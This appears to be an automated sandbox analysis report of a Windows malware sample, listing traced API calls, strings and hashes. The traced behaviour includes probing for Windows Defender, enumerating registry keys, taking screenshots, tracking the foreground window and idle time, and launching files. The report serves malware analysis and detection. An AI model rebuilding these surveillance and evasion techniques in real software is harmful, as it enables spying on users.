                                                                                    control_flow_graph 1523 3075f40-3075f7b CreateMutexW GetLastError 1524 3075f7d 1523->1524 1525 3075f9b-3075fa2 1523->1525 1528 3075f80-3075f99 Sleep CreateMutexW GetLastError 1524->1528 1526 3075fa4-3075faa 1525->1526 1527 3076003-307602d GetModuleHandleW GetConsoleWindow call 307e4f0 1525->1527 1529 3075fb0-3075fe1 call 3086770 lstrlenW call 3076d70 1526->1529 1534 307602f-3076045 call 307f00a 1527->1534 1535 3076048-307604f call 307e850 1527->1535 1528->1525 1528->1528 1542 3075ff3-3076001 Sleep 1529->1542 1543 3075fe3-3075ff1 lstrcmpW 1529->1543 1542->1527 1542->1529 1543->1527 1543->1542
                                                                                    APIs
                                                                                    • CreateMutexW.KERNEL32(00000000,00000000,2024.12.25), ref: 03075F66
                                                                                    • GetLastError.KERNEL32 ref: 03075F6E
                                                                                    • Sleep.KERNEL32(000003E8), ref: 03075F85
                                                                                    • CreateMutexW.KERNEL32(00000000,00000000,2024.12.25), ref: 03075F90
                                                                                    • GetLastError.KERNEL32 ref: 03075F92
                                                                                    • _memset.LIBCMT ref: 03075FB9
                                                                                    • lstrlenW.KERNEL32(?), ref: 03075FC6
                                                                                    • lstrcmpW.KERNEL32(?,03095328), ref: 03075FED
                                                                                    • Sleep.KERNEL32(000003E8), ref: 03075FF8
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 03076005
                                                                                    • GetConsoleWindow.KERNEL32 ref: 0307600F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                                                                    • String ID: 2024.12.25$key$open
                                                                                    • API String ID: 2922109467-228899315
                                                                                    • Opcode ID: 3b7d99d43ff3704659f2ba6b747e0a1d578b1d09ee2cab37c29f3d0138345d14
                                                                                    • Instruction ID: a50c77b84664fbd186a526320e9bebcbc6ab4ff759af401e973e622db429b3b8
                                                                                    • Opcode Fuzzy Hash: 3b7d99d43ff3704659f2ba6b747e0a1d578b1d09ee2cab37c29f3d0138345d14
                                                                                    • Instruction Fuzzy Hash: D621E772D0A309AFE614EB64EC45B9E73D8ABC4704F14481AE6049B1C1DBB5E909C7EB
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID: 2$2$2$3$3$_$e$r$s$s$u$w
                                                                                    • API String ID: 1029625771-3744707172
                                                                                    • Opcode ID: e1859733eebfcf2fbf4a0b9e0044de51f9309db16f947cee2db2299615c06c83
                                                                                    • Instruction ID: 27e9f1c01ee5c9c2bc4191f5b7c330e1c9f60075257b6c3fc99aa86c3d286dbd
                                                                                    • Opcode Fuzzy Hash: e1859733eebfcf2fbf4a0b9e0044de51f9309db16f947cee2db2299615c06c83
                                                                                    • Instruction Fuzzy Hash: AA518BB5E10248AFDB00DFA1D9819BE7F71AB45304F50809DE9481F342E6B99B16CBA1
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 030762CE
                                                                                    • wsprintfW.USER32 ref: 03076336
                                                                                    • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0307635F
                                                                                    • _memset.LIBCMT ref: 03076376
                                                                                    • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 030763B2
                                                                                    • lstrcatW.KERNEL32(030A1F10,?), ref: 030763CE
                                                                                    • lstrcatW.KERNEL32(030A1F10,0309535C), ref: 030763DA
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 030763E3
                                                                                    • lstrlenW.KERNEL32(030A1F10,?,2DB1A981,00000AD4,00000000,75BF73E0), ref: 03076427
                                                                                    • lstrcatW.KERNEL32(030A1F10,030953D4,?,2DB1A981,00000AD4,00000000,75BF73E0), ref: 0307643B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                                                                    • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                    • API String ID: 1671694837-1583895642
                                                                                    • Opcode ID: d3500597e9f0de30b5f556fbf75ef8b8db5340a52c4155b0b347c8092c7493ae
                                                                                    • Instruction ID: a262b490043bd0cfd999fc0f304e2001f5f97680e64d9433a9a93639965654f6
                                                                                    • Opcode Fuzzy Hash: d3500597e9f0de30b5f556fbf75ef8b8db5340a52c4155b0b347c8092c7493ae
                                                                                    • Instruction Fuzzy Hash: 5941A4F1A01668AFDB24DB94CC50FEEB7B8AB48704F0441C9F349A7182D6759A80CF68
                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000002,?,2DB1A981,?,00000000,?), ref: 0307C09E
                                                                                    • GlobalLock.KERNEL32 ref: 0307C0AA
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0307C0BF
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0307C0D5
                                                                                    • EnterCriticalSection.KERNEL32(0309FB64), ref: 0307C113
                                                                                    • LeaveCriticalSection.KERNEL32(0309FB64), ref: 0307C124
                                                                                      • Part of subcall function 03079DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03079E04
                                                                                      • Part of subcall function 03079DE0: GdipDisposeImage.GDIPLUS(?), ref: 03079E18
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0307C14C
                                                                                      • Part of subcall function 0307A460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0307A48D
                                                                                      • Part of subcall function 0307A460: _free.LIBCMT ref: 0307A503
                                                                                    • GetHGlobalFromStream.OLE32(?,?), ref: 0307C16D
                                                                                    • GlobalLock.KERNEL32 ref: 0307C177
                                                                                    • GlobalFree.KERNEL32 ref: 0307C18F
                                                                                      • Part of subcall function 03079BA0: DeleteObject.GDI32 ref: 03079BD2
                                                                                      • Part of subcall function 03079BA0: EnterCriticalSection.KERNEL32(0309FB64,?,?,?,03079B7B), ref: 03079BE3
                                                                                      • Part of subcall function 03079BA0: EnterCriticalSection.KERNEL32(0309FB64,?,?,?,03079B7B), ref: 03079BF8
                                                                                      • Part of subcall function 03079BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,03079B7B), ref: 03079C04
                                                                                      • Part of subcall function 03079BA0: LeaveCriticalSection.KERNEL32(0309FB64,?,?,?,03079B7B), ref: 03079C15
                                                                                      • Part of subcall function 03079BA0: LeaveCriticalSection.KERNEL32(0309FB64,?,?,?,03079B7B), ref: 03079C1C
                                                                                    • GlobalSize.KERNEL32(00000000), ref: 0307C1A5
                                                                                    • GlobalUnlock.KERNEL32(?), ref: 0307C221
                                                                                    • GlobalFree.KERNEL32 ref: 0307C249
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                                                                    • String ID:
                                                                                    • API String ID: 1483550337-0
                                                                                    • Opcode ID: 3cb2941e5f7c67e7c26ba028ae734ded72ac28e3783a4e698a2aaa9ef9ae6846
                                                                                    • Instruction ID: 500e258025cf5250dfa45f8ef245df4a32205c04ee77da8b3adafbc469acd3dd
                                                                                    • Opcode Fuzzy Hash: 3cb2941e5f7c67e7c26ba028ae734ded72ac28e3783a4e698a2aaa9ef9ae6846
                                                                                    • Instruction Fuzzy Hash: 5B6139B5D0221CAFDB10EFA8D8849DEBBB8FF89710F10852AE515EB241DB359905CF94
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 030764C2
                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 030764E2
                                                                                    • RegQueryInfoKeyW.ADVAPI32 ref: 03076524
                                                                                    • _memset.LIBCMT ref: 03076560
                                                                                    • _memset.LIBCMT ref: 0307658E
                                                                                    • RegEnumKeyExW.ADVAPI32 ref: 030765BA
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 030765C3
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 030765D5
                                                                                    • RegCloseKey.ADVAPI32(?,00000000,00000AD4,75BF73E0), ref: 03076625
                                                                                    • lstrlenW.KERNEL32(?), ref: 03076635
                                                                                    Strings
                                                                                    • Software\Tencent\Plugin\VAS, xrefs: 030764D8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                     • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                                                                    • String ID: Software\Tencent\Plugin\VAS
                                                                                    • API String ID: 2921034913-3343197220
                                                                                    • Opcode ID: a668d158e02cd3eef8b045848c8f36a7ef2401f34125292b56aada0c4afa846a
                                                                                    • Instruction ID: 53ba75839a621c5c3bce739f267092d9167a78b9c45b0d5ac6e9f45cec53a593
                                                                                    • Opcode Fuzzy Hash: a668d158e02cd3eef8b045848c8f36a7ef2401f34125292b56aada0c4afa846a
                                                                                    • Instruction Fuzzy Hash: B241B9F5E4121DBBDB34EB54CD85FEA737CEB44600F404599E309B7041EA719A858FA8
                                                                                    APIs
                                                                                      • Part of subcall function 10015750: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10015783
                                                                                      • Part of subcall function 10015700: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001571E
                                                                                    • _Smanip.LIBCPMTD ref: 10015B0A
                                                                                    • _Smanip.LIBCPMTD ref: 10015BA4
                                                                                    • memset.VCRUNTIME140(?,00000000,00000038,?,?,?,0000002F,?,00000070,?), ref: 10015C85
                                                                                    • ShellExecuteExA.SHELL32(0000003C,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015CE1
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015CFD
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015D0A
                                                                                    • CopyFileA.KERNEL32 ref: 10015D73
                                                                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 10015D99
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                     • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$ExecuteModuleNameShellSmanip$CloseCopyHandleObjectSingleWaitmemset
                                                                                    • String ID: %s\%s$open
                                                                                    • API String ID: 1843445691-538903891
                                                                                    • Opcode ID: e7f28f5a4b885a6ba46114f6e73ff4f4218401e27e461504ff04f219dfe5ff0b
                                                                                    • Instruction ID: 9eb432f15a048c8dfdefea35090f5a4ff5850cd705bbf9561c51413f96cb23ad
                                                                                    • Opcode Fuzzy Hash: e7f28f5a4b885a6ba46114f6e73ff4f4218401e27e461504ff04f219dfe5ff0b
                                                                                    • Instruction Fuzzy Hash: 48021374C083D8DEEB11CBA4C859BDDBFB5AF15304F0441D9D1496B282DBBA5B88CB62
                                                                                    APIs
                                                                                    • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0307A48D
                                                                                    • _malloc.LIBCMT ref: 0307A4D1
                                                                                    • _free.LIBCMT ref: 0307A503
                                                                                    • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 0307A522
                                                                                    • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 0307A594
                                                                                    • GdipDisposeImage.GDIPLUS(00000000), ref: 0307A59F
                                                                                    • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0307A5C5
                                                                                    • GdipDisposeImage.GDIPLUS(00000000), ref: 0307A5DD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                     • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                                                                    • String ID: &
                                                                                    • API String ID: 2794124522-3042966939
                                                                                    • Opcode ID: d86e30e8550c75f270cc5b08d63a66c8a6710e18ac02afafc1505abbc614e577
                                                                                    • Instruction ID: b13781807b4edab11a837ade3ab12dbeb2c90708049f0d9569016150e8519545
                                                                                    • Opcode Fuzzy Hash: d86e30e8550c75f270cc5b08d63a66c8a6710e18ac02afafc1505abbc614e577
                                                                                    • Instruction Fuzzy Hash: AE5163B5E02219AFDB14DFA4C844EEEB7F8BF88740F048519E905AB350D734A905CBE8
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 02715382
                                                                                    • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 02715392
                                                                                    • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,0272C6E0,000012A0), ref: 027153B0
                                                                                    • RegCloseKey.KERNEL32(?), ref: 027153BB
                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0271540F
                                                                                    • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0271541B
                                                                                    • Sleep.KERNEL32(00000BB8), ref: 02715434
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                     • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                    • String ID: IpDates_info$SOFTWARE
                                                                                    • API String ID: 864241144-2243437601
                                                                                    • Opcode ID: 9d627ac1ebeab97241fc44f1b4b41c6f1e5c2f66dfd322972cb14ca2a6dddb97
                                                                                    • Instruction ID: 45188d72c9ea0cc4d9852fb65dd45705bdea2c736164308565eeeb0cb7b84339
                                                                                    • Opcode Fuzzy Hash: 9d627ac1ebeab97241fc44f1b4b41c6f1e5c2f66dfd322972cb14ca2a6dddb97
                                                                                    • Instruction Fuzzy Hash: FF41D872A842419FD32D8F3C8C4AF7BBBA5EF95308FD94549E58197142D3B0D50AC792
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 02715382
                                                                                    • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 02715392
                                                                                    • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,0272C6E0,000012A0), ref: 027153B0
                                                                                    • RegCloseKey.KERNEL32(?), ref: 027153BB
                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0271540F
                                                                                    • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0271541B
                                                                                    • Sleep.KERNEL32(00000BB8), ref: 02715434
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                     • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                    • String ID: IpDates_info$SOFTWARE
                                                                                    • API String ID: 864241144-2243437601
                                                                                    • Opcode ID: f2b2a572b9429f76a029f12935df9aacf6e0c38a31740ab46e06dc34425f06f0
                                                                                    • Instruction ID: d4ba3a8f71d592fee618f2bd0ddc94754b63e520507313bdfc4f9b8e142fb5a3
                                                                                    • Opcode Fuzzy Hash: f2b2a572b9429f76a029f12935df9aacf6e0c38a31740ab46e06dc34425f06f0
                                                                                    • Instruction Fuzzy Hash: BB31C4306843819FE73DCF38881AF7ABBA5AF85308FDD8848E5859B142C3B0D50AC752
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F,?,?,00000000,00000000,00000000), ref: 0040C17A
                                                                                    • LeaveCriticalSection.KERNEL32(00665C14,00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F,?,?,00000000,00000000), ref: 0040C19E
                                                                                    • LeaveCriticalSection.KERNEL32(00665C14,00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F,?,?,00000000,00000000), ref: 0040C1AD
                                                                                    • IsValidLocale.KERNEL32(00000000,00000002,00665C14,00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F), ref: 0040C1BF
                                                                                    • EnterCriticalSection.KERNEL32(00665C14,00000000,00000002,00665C14,00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F), ref: 0040C21C
                                                                                    • LeaveCriticalSection.KERNEL32(00665C14,00665C14,00000000,00000002,00665C14,00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F), ref: 0040C245
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                                    • String ID: en-GB,en,en-US,
                                                                                    • API String ID: 975949045-3021119265
                                                                                    • Opcode ID: 0a5da7250e5a4448c1ff3f9645c04e69b407b2ebd84de03ae06c26d7c7f18a7c
                                                                                    • Instruction ID: 62fecbf31074def960baab5c845f0e3528801b11b7ae68e71bde5ae064a172bd
                                                                                    • Opcode Fuzzy Hash: 0a5da7250e5a4448c1ff3f9645c04e69b407b2ebd84de03ae06c26d7c7f18a7c
                                                                                    • Instruction Fuzzy Hash: EC2196A0750701BADB207BBA8C8365925999B85B09F50457FF041BB7C2DE7C9D4182AF
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,030912F8,2DB1A981,00000001,00000000,00000000), ref: 0307CAB1
                                                                                    • RegQueryInfoKeyW.ADVAPI32 ref: 0307CAE0
                                                                                    • _memset.LIBCMT ref: 0307CB44
                                                                                    • _memset.LIBCMT ref: 0307CB53
                                                                                    • RegEnumValueW.KERNEL32 ref: 0307CB72
                                                                                      • Part of subcall function 0307F707: _malloc.LIBCMT ref: 0307F721
                                                                                      • Part of subcall function 0307F707: std::exception::exception.LIBCMT ref: 0307F756
                                                                                      • Part of subcall function 0307F707: std::exception::exception.LIBCMT ref: 0307F770
                                                                                      • Part of subcall function 0307F707: __CxxThrowException@8.LIBCMT ref: 0307F781
                                                                                    • RegCloseKey.KERNEL32(030912F8,?,?,?,?,?,?,?,?,?,?,?,00000000,030912F8,000000FF), ref: 0307CC83
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                     • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                                                                    • String ID: Console\0
                                                                                    • API String ID: 1348767993-1253790388
                                                                                    • Opcode ID: 44bf4ded7bd3f1967069259dfb1c8b63e64528d3b45ffa31c636a2a2534d16ac
                                                                                    • Instruction ID: 1bb89b27930279cc5efc7218f9451f6f0166f63f87efab9d79a31ea1b9c21214
                                                                                    • Opcode Fuzzy Hash: 44bf4ded7bd3f1967069259dfb1c8b63e64528d3b45ffa31c636a2a2534d16ac
                                                                                    • Instruction Fuzzy Hash: 23611FB5D01219AFDB04DFA8D880EEEB7B8FF88310F14456AE915EB245D7349901CBA4
                                                                                    APIs
                                                                                      • Part of subcall function 0307F707: _malloc.LIBCMT ref: 0307F721
                                                                                    • _memset.LIBCMT ref: 0307BB21
                                                                                    • GetLastInputInfo.USER32(?), ref: 0307BB37
                                                                                    • GetTickCount.KERNEL32 ref: 0307BB3D
                                                                                    • wsprintfW.USER32 ref: 0307BB66
                                                                                    • GetForegroundWindow.USER32 ref: 0307BB6F
                                                                                    • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 0307BB83
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                     • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                                                                    • String ID: %d min
                                                                                    • API String ID: 3754759880-1947832151
                                                                                    • Opcode ID: 9d7cf5e9a0b16ddf0548154d69a761d92152b79c169bf576e43186787132de4c
                                                                                    • Instruction ID: c5064d333844729e1d26562f48079e835e888292f7ee429a441f3ff38ca5593c
                                                                                    • Opcode Fuzzy Hash: 9d7cf5e9a0b16ddf0548154d69a761d92152b79c169bf576e43186787132de4c
                                                                                    • Instruction Fuzzy Hash: 6441A4B5D01218AFCB10EFA4D884EDFBBB8EF88700F188555E9099B345D6749A04CBE5
APIs
• GetCurrentProcessId.KERNEL32(2DB1A981,00000000,00000000,75BF73E0,?,00000000,030910DB,000000FF,?,03076AB3,00000000), ref: 03076938
• OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,030910DB,000000FF,?,03076AB3,00000000), ref: 03076947
• OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,030910DB,000000FF,?,03076AB3,00000000), ref: 03076960
• CloseHandle.KERNEL32(00000000,?,00000000,030910DB,000000FF,?,03076AB3,00000000), ref: 0307696B
• SysStringLen.OLEAUT32(00000000), ref: 030769BE
• SysStringLen.OLEAUT32(00000000), ref: 030769CC
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,030910DB,000000FF), ref: 03076A2E
• CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,030910DB,000000FF), ref: 03076A34
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: CloseHandleProcess$OpenString$CurrentToken
• String ID:
• API String ID: 429299433-0
• Opcode ID: 109509788f21255b895eaa3f1f68fc4d233fa5924139c2817147c0eda63f17fc
• Instruction ID: 63da5c9e6a4ab377852ffdafbf2c03853d3561431edc05d761dd9781e66d2cb5
• Opcode Fuzzy Hash: 109509788f21255b895eaa3f1f68fc4d233fa5924139c2817147c0eda63f17fc
